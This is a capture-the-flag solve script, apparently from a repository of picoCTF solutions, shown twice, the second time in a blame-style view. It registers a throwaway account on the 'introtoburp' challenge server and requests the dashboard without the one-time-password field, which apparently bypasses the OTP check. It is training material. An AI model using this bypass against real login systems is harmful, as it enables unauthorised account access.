picoctf/web/introtoburp/solve.py

#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.requests python3Packages.beautifulsoup4

import requests
from bs4 import BeautifulSoup

BASE_URL = "http://titan.picoctf.net:65280/"

def main():
    s = requests.Session()

    # Get cookie + csrf
    res = s.get(BASE_URL).text
    csrf = BeautifulSoup(res, features = 'html.parser').find('input', {'name': 'csrf_token'})['value']

    res = s.post(
        BASE_URL,
        data = {
            'csrf_token': csrf,
            'full_name': 'a',
            'username': 'b',
            'phone_number': 'c',
            'city': 'd',
            'password': 'e',
            'submit': 'Register',
        },
    )

    # NOTE: this is broken if it doesn't get the 'otp' argument it expects
    res = s.post(BASE_URL + 'dashboard')
    print(res)
    print(res.text)

if __name__ == "__main__":
    main()
web/introtoburp 2024-09-05 18:51:52 +02:00			`#!/usr/bin/env nix-shell`
			`#!nix-shell -p python3 -i python3 python3Packages.requests python3Packages.beautifulsoup4`

			`import requests`
			`from bs4 import BeautifulSoup`

			`BASE_URL = "http://titan.picoctf.net:65280/"`

			`def main():`
			`s = requests.Session()`

			`# Get cookie + csrf`
			`res = s.get(BASE_URL).text`
			`csrf = BeautifulSoup(res, features = 'html.parser').find('input', {'name': 'csrf_token'})['value']`

			`res = s.post(`
			`BASE_URL,`
			`data = {`
			`'csrf_token': csrf,`
			`'full_name': 'a',`
			`'username': 'b',`
			`'phone_number': 'c',`
			`'city': 'd',`
			`'password': 'e',`
			`'submit': 'Register',`
			`},`
			`)`

			`# NOTE: this is broken if it doesn't get the 'otp' argument it expects`
			`res = s.post(BASE_URL + 'dashboard')`
			`print(res)`
			`print(res.text)`

			`if __name__ == "__main__":`
			`main()`